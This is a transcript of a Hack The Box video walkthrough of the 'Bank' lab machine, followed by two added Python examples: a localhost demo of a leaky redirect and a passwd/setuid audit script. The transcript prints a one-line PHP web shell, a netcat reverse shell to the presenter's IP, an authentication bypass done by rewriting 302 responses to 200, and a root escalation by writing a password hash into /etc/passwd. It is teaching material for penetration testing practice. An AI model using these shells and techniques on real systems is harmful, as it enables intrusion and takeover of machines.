HackTheBox - Bank
00:39 - Nmap Results
01:15 - DNS Enumeration
04:08 - HTTP VirtualHost Routing
05:28 - DirSearch (Web Enumeration)
08:50 - HTTP Redirect Vulnerability
13:23 - PW in Balance-Transfer
18:00 - File Upload, WebShell
21:48 - First Shell
30:10 - First Privesc Method (SUID)
31:38 - Second Privesc Method (passwd)
What You'll Learn
The video walks through the Hack The Box machine Bank. Nmap shows SSH, DNS on TCP 53 and Apache; a DNS zone transfer for bank.htb reveals extra hostnames, and the Host header selects the bank virtual host. dirsearch finds pages that answer with a 302 redirect yet still carry a full page body, so rewriting the status to 200 in Burp exposes them without logging in (the unintended route), while the one oddly sized file in balance-transfer holds valid credentials (the intended route). A PHP web shell uploaded with a GIF89a header and the .htb extension that the support page executes as PHP gives a www-data reverse shell, and root follows either from a setuid-root binary (/var/htb/bin/emergency) or from a world-writable /etc/passwd.
Full Transcript
Hey guys, what's going on? This is IppSec and we'll be doing the Bank machine from Hack The Box. This box got a little bit of hate because there's some guesswork involved to get the initial webpage, but once you do that there's almost two ways to do every other step, which is awesome: one way that was intended, the other way that is unintended. Turns out writing software is hard, and then writing software that's intentionally vulnerable is even harder. So we're gonna be jumping right into this box.

So you know the drill: we're gonna nmap the box with safe scripts and enumerate versions, output all formats, and then the IP address of Bank, which is 10.10.10.29. I already ran this, so let's just look at the results. We do see it listening on three ports: 22 SSH; 53 DNS, and this is odd, normally DNS is only UDP, it uses TCP in cases when the response is greater than 512 bytes I believe, and that happens normally in DNS zone transfers, which are normally disabled, and in rare cases DNSSEC or IPv6, but most of the time when you see DNS on 53 TCP and not just UDP, zone transfers may be enabled, so that is something to look into; and then you of course have Apache listening on port 80.

So let's begin by poking at the DNS. I'm going to open up nslookup, type server 10.10.10.29 to change it to Bank's DNS port, I guess, and we're gonna test a few things I normally test, like 127.0.0.1, to see what it responds with; maybe you'll get lucky and it says a hostname, they're exposed to something. Next thing is the IP address of the server, so 10.10.10.29: reverse lookups are not enabled, so we don't get a result there. We think the name may be bank.htb because that's what Hack The Box's portal says, so we're gonna try that, and we do see it respond. A few other things I may try running is dnsrecon, so I'm gonna do dnsrecon -r 127.0.0.0/24. What that's going to do is take this octet and just go 1 to 255; if it was /16 this one and this one would go 1 to 255, and then /8 all three of these, a little bit of networking there. And then we have to specify the name server, so 10.10.10.29, and we see no extra responses. I could flip this to a 1 because a lot of hosts files also include like 127.0.1.1, and don't get anything. The last thing, let's see what else is on that 10 subnet, and we get nothing. So let us try a DNS zone transfer: I'm going to dig axfr, these are the flags to do a zone transfer, and then @10.10.10.29, the DNS server. We get a response but nothing, so zone transfers are not enabled for the root zone. The next thing, let's specify bank.htb as the zone, and we get the zone transfer being successful. The only thing this really tells us is we have a few extra name servers or subdomains: we have chris.bank.htb, ns.bank.htb and www.bank.htb, so a few extra domain names. We're gonna add those to a hosts file... ah, actually we have DNS, so why don't we just add them to resolv.conf and specify we want to use Bank as a DNS server, so 10.10.10.29, and then I can ping bank.htb now. Awesome, so that's it for the DNS portion and now we'll be digging into the web.

Let's open up Firefox and go to 10.10.10.29. We get the Apache default index page, we see right here Apache2 Ubuntu Default, and if we went to bank.htb we get something completely different. So if you're not familiar with virtual host routing, we'll show you how it works real quick. Let's just send this request into Burp, then press Ctrl-R and send to Repeater, right-click, Go. We send this request, we get the Apache2 Ubuntu Default page. Virtual host routing works by this Host header, so I'm going to change this to bank.htb and then send, Go, and we get something completely different: an HTTP redirect, which is odd to see when you also see a bunch of source down here. This is a vulnerability in and of itself and we'll go into this in just a little bit, but in virtual host routing Apache just examines this Host field and then, based upon the value, sends you to a different web page. So that's how that all works.

The first thing I would be doing is testing a bunch of SQL injection here. This isn't vulnerable, I don't believe, so I'm just gonna skip that; you should look at other videos to see how sqlmap works and just some things I do to test it. So we don't have a login; the next step would be to run a DirBuster. We've already shown you DirBuster. I didn't like DirBuster because I went back in the video where I had used it and verified that recursive wasn't checked, and for some reason it still did recursive. So I was trying to use gobuster, which is like DirBuster written in Go, but it doesn't do one thing that I need for this video, so we're gonna be using dirsearch. So cd /opt/dirsearch; I just ran a git clone. If you just Google "dirsearch python" you'll come to the GitHub page and then just download it. So we do python dirsearch.py and we see it requires Python 3, so I'm going to specify python3, and then "URL target is missing", so let's just do a -h to get all the flags. So what we want to do is we'll specify a URL, so -u. We're going to want to specify extensions with -e because we know this is a PHP page, so we're going to take a wordlist, and that's gonna search the wordlist to get directories, and that's gonna take every entry in that wordlist and append .php to try to get files, so we definitely want that -e. -w, the wordlist. -f, force extensions, so force extensions for every wordlist entry like in DirBuster; we're gonna want that. Recursive, we don't want that; this is why we're not actually using DirBuster, because this makes it take forever. Threads, we can use some threads. Header, if we wanted to put a referer or user agent. We don't have to specify the Host header because it automatically does that when we specify bank.htb in the URL. So let's run this: it was python3 dirsearch, wordlist, so /usr/share/wordlists/gobuster... and it's not; let me show you all the files in this directory, so copy this. So I normally run this directory-list-2.3-medium; this will take forever, so I took the entries I wanted and then created some fake entries and put them in bank-vid, so you won't have that directory, but that's what I'm gonna be using because I want to go fast. So -w /usr/... damn it, copy that: /usr/share/wordlists/dirbuster/bank-vid. And then what else do we want? We want extensions for PHP, we want force extensions, we want to do, let's say, 20 threads, and the -u for URL, and I think that's what we want. So running this, and we see it doing a bunch of requests, and the output here: so we have a balance-transfer directory. These 302 responses, we already saw what that is, but it's odd to see seven kilobytes; it should just be bytes, because it should just redirect you and that's it, it shouldn't have anything below that redirect. We also see the same thing for support.php.

So balance-transfer was the intended way to get the machine, so we're gonna do that way first and then I'll show you these... abusing... actually no, we're gonna reverse that. We're gonna start here, show you what you could do, and then balance-transfer, because this will log you in to the web application legitimately. So if we go back to Burp, what we want to do is tell the browser that this isn't 302 Found, this is 200 OK, because when a browser sees this it's gonna forward us to the redirect, which would be login.php, and where does that... it should have a Location... oh yeah, there's the Location, I just can't read. So the browser sees 302 Found, pulls Location and then goes to it. We can verify that behavior by just going to Burp; let's try to intercept... off, or intercept on, and we're gonna intercept server responses. So refresh this, intercept, so we're gonna get login... so wait, now I want to get index, index.php, let's do that. So we get index, we get this 302 Found, then the browser goes "yep, I'm gonna follow that", GET login, and then we get the login page. So what would have happened if we do index.php... I turned intercept off, not a habit. So we're gonna get this index, and instead of the server telling us 302 Found, what if it just said 200 OK? So the browser did not go to this Location header; we get some 404s, but completely different. So what we can do in Burp is just automatically rewrite all the responses. So we're gonna go down to Match and Replace, and I'm gonna say on the... let's see, should be response header, yeah, response header right there. We're gonna match 301 or 2, and what was the other piece of that header... 302 Found, so "30(1|2) Found", and replace it with "200 OK", and we'll give the comment of "ignore redirect". Not sure if this is all caps or if it matters, but we're gonna enable regular expressions because this is a regular expression, to do the 1 or 2; click OK. And now let's just go to index.php and see if it redirects us: it does not. So now we can also do support.php and get to this page. So that is the unintended way to get to support.php; once you do this, this is how you upload a shell. We'll be doing that shortly, but I want to show you the intended way next.

So let's go back to dirsearch: we have this balance-transfer directory, so let's just go there, and before we do anything let's disable the rewrite because we don't need this anymore. So let's go to my bookmarks, balance-transfer, and we get a bunch of files. If we try to click one of these files we just get "OK ENCRYPT SUCCESS" and a bunch of information; if we try to base64-decode this it doesn't work, it's encrypted, so that's a dead end. If you scroll around you'll see one of these is not 580-some bytes, it is like 200. So the easiest way to do this is we're going to copy this, let's go back to our Hack The Box folder, and we're gonna do a wget -r and then the URL, and what this is gonna do is download everything we just saw right here. The other way to do this, if you have Burp Pro, is go into Target, let's go down to balance-transfer, add this to scope (and we're adding the balance-transfer folder), I'm going to spider the balance-transfer folder and we'll see all these go from grey to black, which means we have a response, and then click on this filter and say "ENCRYPT SUCCESS" and negative search, so don't show us anything that has a response of "ENCRYPT SUCCESS". Okay, I guess it's filtering, hopefully... yeah, so it's now removing all this, and while that's doing that we can see if wget's finished... they have them. So right now we're just waiting for either wget to finish or Burp to finish filtering, because one of these requests does not have "ENCRYPT SUCCESS". So unfortunately there's a lot of requests, like a lot, so it could take a little bit. Let's just go back here and I'm gonna cheat: I think it's 280-something, is it 284? No, it's this size; we have to look at one of these files, it's not 500 bytes, it's 200, and the reasoning is the encryption just made it a bit bigger. So come on, come on, where is it? It's like finding a needle in a haystack. Well, hopefully something finished; let's see, wget's finished, so we go into the folder it created, bank.htb/balance-transfer, and we have all the files. Let's get rid of these index.html files because they don't matter, and we can just do a word count and specify -c for characters on all these files, and we see that 580. So let's just sort -n, now we sorted it by file size, and then we'll add the -r flag for reverse, and we get 257 here (and I changed the size of this window, that's annoying). And running less on this file gives us an email address and password. So did it finish? It did as well, so let's disable this, and we'll begin by logging in: so email chris@bank.htb and the password is the HTB bank password, log in, and we get to the dashboard, finally.

So the next thing to do would be just, I guess, click around. We go to Support, we get the support portal, and let's just delete these files, I forgot to revert this machine. So let's just try uploading something: test, test, choose file. I want to go to locations, so I think, yeah, I have all my shells in /opt/shell and we'll do PHP. I'm just going to do this corner.gif; it sets my metadata and all that to be an image, because images are generally accepted. So, intercept on, submit, and I'm gonna get rid of this and we leave that GIF89a. The reason I do that, just like in the Popcorn video: if we create a file and we have GIF8 at the top and then specify anything, we do a file against that and the magic bytes say it's an image. So if it's using magic bytes to test if we're uploading an image, having that GIF8 as the first few bytes will fix that, so I leave that in. I'm going to do <?php echo system($_REQUEST['ippsec']); ?>, so a basic PHP web shell just running commands one at a time. Send this over to Repeater and we'll change... add .php there. So for this request, off; we don't need to intercept responses anymore, so let's undo that, and we get "oh, you can only upload images". So that's odd. Going to Repeater, let's see exactly what happened: let's just upload corner.gif to see if it was that .php we appended that caused an error. Does render work? So we do see it uploaded it when we didn't have that .php, but when we're scrolling through this we saw an HTML comment: "DEBUG: I added the file extension .htb to execute as PHP for debugging purposes only". So instead of .gif let's do .htb, upload, render, and we see another file uploaded. Awesome. So F5, we're not intercepting, go here, refresh the page, I'll just do that, and we see the two files going over. These attachments: we can see that corner.htb has been uploaded, and if we add the ippsec command that we coded, we do have code execution.

So the next step would be to do a reverse shell, so we can do like a which nc and see, we do; nc is netcat. Let's just try netcat: nc -e /bin/sh, and we'll specify -nv ... 881, my IP address 10.10.14.41, that's what I wanted, and we get a shell. So we're gonna do the python -c 'import pty; pty.spawn("/bin/bash")'. Actually, before I do that I can prove I have a shell: we just do whoami, www-data, so it's just not giving us the prompt. So now I can run... okay, now I'm going to background this with Ctrl-Z, stty raw -echo, and then type fg, and I have a full shell with like tab completion, which makes life easy. "TERM not set", so that's that; TERM, let's go with screen, export TERM=screen, and now I can clear too. Awesome.

So now for privesc. The first thing I do is I wanted to see if I can figure out how that encrypt function worked, so I'm going to grep recursively, which will grep all these files in here for "encrypt" because it put that in those files; if I do . and I'm gonna do a grep -v to exclude the balance-transfer. There's probably a more elegant way to do this, but this is the quick way. You don't see this in any of the PHP files, so I'm guessing something else encrypts it, not the PHP files. No idea what does, never found it, but I guess that's one of the reasons people don't like this machine, because the encryption is kind of a rabbit hole; there's a lot of files to go through. So that's a dead end, we stop looking at that. The next thing, I poked around these PHP files and we see the user.php; it wouldn't matter if I just kept that, and these are the credentials to MySQL. So I would first mysql -u root, log into MySQL, and then, oh my god, I'm drawing a blank on how to drop to a shell... that's it, do that, drop to a shell. We don't see us escalate to root; sometimes you'll get lucky and when you execute the shell from MySQL it's configured to just allow you to be the user that's running MySQL, and sometimes MySQL is running as root. Very quick check, just do that. The next thing is I'll try to SSH to bank.htb as root and we'll use that password I had copied back here, that secure password, and we get permission denied, so that's not root's password. We're gonna cat /etc/passwd and we see, let's see, what is the user: chris. So we'll just try that for chris to see if we get out of this www user, and we don't, so we don't have chris's or root's password. The next thing of course would be just to do the enumeration scripts, so I'm gonna press Ctrl-A and then double quote to split that horizontally, and we're gonna run the Python HTTP server. So /opt/linux, and we have a few enumeration scripts; if you just Google these you can pull them, you should be familiar with all of them. So python -m SimpleHTTPServer, and then we're just gonna wget on my IP, so 10.10.14.41:8000, and we specify that -r flag again, and we see it downloaded all the files. So we can stop this SimpleHTTPServer and go into this. So we have LinEnum, linuxprivchecker and unix-privesc-check. So the first one we run is LinEnum... oh man, that just went slow, and we'll see what this gives us as output. We actually saw someone SSH in as chris, I guess someone guessed the password. So let's go to the top... I guess, hold on, while we go through this, let's... never mind, I was gonna open up another session and run a different script, but this unix-privesc-check should be all we need. So, the top: okay, kernel information, 2017, the kernel's been updated so it's not vulnerable to things like Dirty COW, so we don't have to go there. We're running Ubuntu 14.04, and root... I don't even know what that password is, that's odd, but it's on a 192 subnet, so it looks like it's a player. So it's searching for potential users on the box in /etc/passwd, where we saw root and chris; home directory permissions; cron jobs, I don't see any crons that don't look normal and I don't have write access to any of them or cron stuff; IP stuff, looking at listening sockets, so MySQL, I don't see any services that look like we can abuse, just listening on localhost; UDP, that's DNS 53; running processes; service permissions; it's going through the Apache directory, we already looked at this, so many encrypted files, okay, so that's the end of the Apache; useful files, nmap on this box, awesome, netcat, wget, gcc; configuration files; oh, missed this: can we read or write sensitive files? We have write access to /etc/passwd, so this is a good one, I think an unintended privesc, so keep that one in mind. And it doesn't look like that found setuid... wait, so we're going to run find / -perm -4000; this is gonna look for files that have the setuid bit set. If we do linuxprivchecker.py it'll also run this, but it takes a while, so let's just see if we can speed it up by running this manually, and hope I did this correctly. Yes, so we do see the /var/htb/bin/emergency, so let's see who owns this. So we could have just done like, I think, -exec... whoa, that's weird, let's copy this and clear, something happened with my terminal window. Okay, let's just do ls -la; my command was too long and it freaked out. So we see sticky is set and root owns this, so if we just execute this to see what happens, it just drops us to a shell immediately and we become root effective user ID, and if we just do ls /root, boom.

The other way would be, we can just edit this passwd file. So if we do openssl passwd --help we can see the algorithms, and what this is doing is I want to create an encrypted password; I'm going to put that in the passwd file. So if we just do passwd ippsec, it gives us the standard UNIX password algorithm, encrypted. If we had done the -1 flag to specify MD5, you may be more familiar with that format. But since it says we have write access to passwd, let's try writing: so change that, put the password where it should be, and then we try writing it: "cannot create backup file", so vi says add an exclamation point to override. And then if we su root and type ippsec, we get in, and we could have also just SSH'd to bank.htb with ippsec and logged in. So when passwd is world-writable, just write a password and log in. And yeah, hope you enjoyed the video, take care.
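The virtual-host routing and the "302 with a full page body" behaviour described in the walkthrough, as an added example that is not part of the video or of the Bank machine's own code. It runs a small local HTTP server that routes on the Host header and reproduces the PHP mistake behind the redirect bug (header('Location: login.php') with no exit() after it), then fetches pages with an explicit Host header without following redirects, the way Burp Repeater does. The hostnames, paths and page contents are constructed; the only thing taken from the video is that bank.htb is the virtual host and index.php and support.php are the pages that redirect.

```python
# Added example, not from the video: Host-header routing plus the
# "redirect that still renders the page" bug, with the check a practitioner
# would run over dirsearch/Burp output to spot it.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

VHOST = "bank.htb"  # the virtual host Apache routes on (from the video)
DEFAULT_PAGE = "<html><body><h1>Apache2 Ubuntu Default Page</h1></body></html>"
LOGIN_PAGE = "<html><body><form action='login.php'>login</form></body></html>"
# Constructed "logged-in" page, made large enough to resemble the ~7 KB
# bodies dirsearch reported behind the 302s.
PROTECTED_PAGE = (
    "<html><body><h1>Bank dashboard</h1><table>"
    + "".join(f"<tr><td>transfer {i:03d}</td><td>${i * 100}</td></tr>" for i in range(60))
    + "</table></body></html>"
)
AUTH_ONLY = {"/", "/index.php", "/support.php"}


class BankHandler(BaseHTTPRequestHandler):
    """Routes on the Host header. `leaky` reproduces PHP's
    header('Location: login.php') with no exit() after it."""
    leaky = True

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        if host != VHOST:
            return self._reply(200, DEFAULT_PAGE)  # any other Host: default vhost
        if self.path in AUTH_ONLY:
            # Unauthenticated, so redirect to login. The leaky variant keeps
            # rendering the protected page after emitting the Location header.
            body = PROTECTED_PAGE if self.leaky else ""
            return self._reply(302, body, location="login.php")
        if self.path == "/login.php":
            return self._reply(200, LOGIN_PAGE)
        return self._reply(404, "Not Found")

    def _reply(self, status, body, location=None):
        data = body.encode()
        self.send_response(status)
        if location is not None:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def start_server(leaky=True):
    """Bind an ephemeral localhost port and serve in a daemon thread."""
    handler = type("Handler", (BankHandler,), {"leaky": leaky})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(port, host_header, path):
    """One raw GET with an explicit Host header; redirects are NOT followed.
    Returns (status, Location header or None, body)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.putrequest("GET", path, skip_host=True)
    conn.putheader("Host", host_header)
    conn.endheaders()
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, resp.getheader("Location"), body


def is_leaky_redirect(status, location, body, min_body=512):
    """A 3xx with a Location header should carry (almost) no body. A fat body
    means the server kept rendering the protected page; rewrite the status to
    200 OK in the proxy and read it without logging in."""
    return 300 <= status < 400 and location is not None and len(body) >= min_body


def demo(leaky=True):
    server = start_server(leaky)
    port = server.server_address[1]
    try:
        return {
            "default_vhost": fetch(port, "10.10.10.29", "/"),
            "bank_index": fetch(port, VHOST, "/index.php"),
            "bank_support": fetch(port, VHOST, "/support.php"),
        }
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, (status, location, body) in demo().items():
        flag = "LEAKY" if is_leaky_redirect(status, location, body) else "ok"
        print(f"{name:14s} {status} Location={location} body={len(body)}B {flag}")
```

Running demo(leaky=False) shows the fixed behaviour: the same 302 with an empty body, which is what the PHP side gets by calling exit() right after header(). The threshold in is_leaky_redirect is a heuristic; a redirect body of a few dozen bytes (a "Moved" stub) is normal, several kilobytes is not.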
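The two root paths at the end of the walkthrough (a setuid-root binary and a writable /etc/passwd), as an added example that is not from the video: the checks a practitioner would run, either as the attacker confirming the foothold or as the defender auditing the box afterwards. The passwd text is constructed to mirror the video's end state, a crypt(3) hash written straight into root's password field in place of the usual x; the hash string itself is a placeholder, not a real hash, and the file paths used for the setuid walk are ordinary defaults.

```python
# Added example, not from the video: audit /etc/passwd for the abuse patterns
# a writable passwd file enables, and find setuid-root files the way
# `find / -perm -4000 -uid 0` does.
import os
import re
import stat

# Constructed sample modelled on the video's end state: root's password field
# holds a hash (placeholder value) instead of 'x', so /etc/shadow is bypassed.
SAMPLE_PASSWD = """\
root:$1$saltsalt$PLACEHOLDERHASHVALUE00:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
"""

# crypt(3) prefixes: $1$ md5crypt, $5$ sha256, $6$ sha512, $2*$ bcrypt, $y$ yescrypt
CRYPT_RE = re.compile(r"^\$(1|2[abxy]?|5|6|y|7)\$")
LOCKED = {"x", "*", "!", "!!", "*NP*"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; raise on a malformed line."""
    users = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def audit_passwd(text):
    """Return (kind, username) findings: a usable hash in passwd itself,
    an empty password field, or a second UID-0 account."""
    findings = []
    for u in parse_passwd(text):
        if u["pw"] == "":
            findings.append(("empty-password", u["name"]))
        elif u["pw"] not in LOCKED and CRYPT_RE.match(u["pw"]):
            findings.append(("hash-in-passwd", u["name"]))
        if u["uid"] == 0 and u["name"] != "root":
            findings.append(("extra-uid0", u["name"]))
    return findings


def writable_by_me(path):
    """The check unix-privesc-check reported: can the current user write it?"""
    return os.access(path, os.W_OK)


def is_setuid_root(st_mode, st_uid):
    """Regular file, setuid bit set, owned by uid 0."""
    return stat.S_ISREG(st_mode) and bool(st_mode & stat.S_ISUID) and st_uid == 0


def setuid_root_files(root="/", skip=("/proc", "/sys", "/dev")):
    """Walk the tree and list setuid-root files (lstat, so symlinks are not followed)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(skip):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_setuid_root(st.st_mode, st.st_uid):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for kind, who in audit_passwd(SAMPLE_PASSWD):
        print(f"[passwd] {kind}: {who}")
    print("[passwd] /etc/passwd writable by me:", writable_by_me("/etc/passwd"))
    for path in setuid_root_files("/usr/bin"):
        print("[suid]  ", path)
```

On a real host, compare the setuid list against the distribution's expected set (passwd, sudo, su, mount and so on); an unexplained entry such as /var/htb/bin/emergency is the thing to look at. Any non-locked value in passwd's second field means the system is not consulting /etc/shadow for that account, which is exactly what the openssl passwd trick in the video relies on.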
Playlist: Uploads from IppSec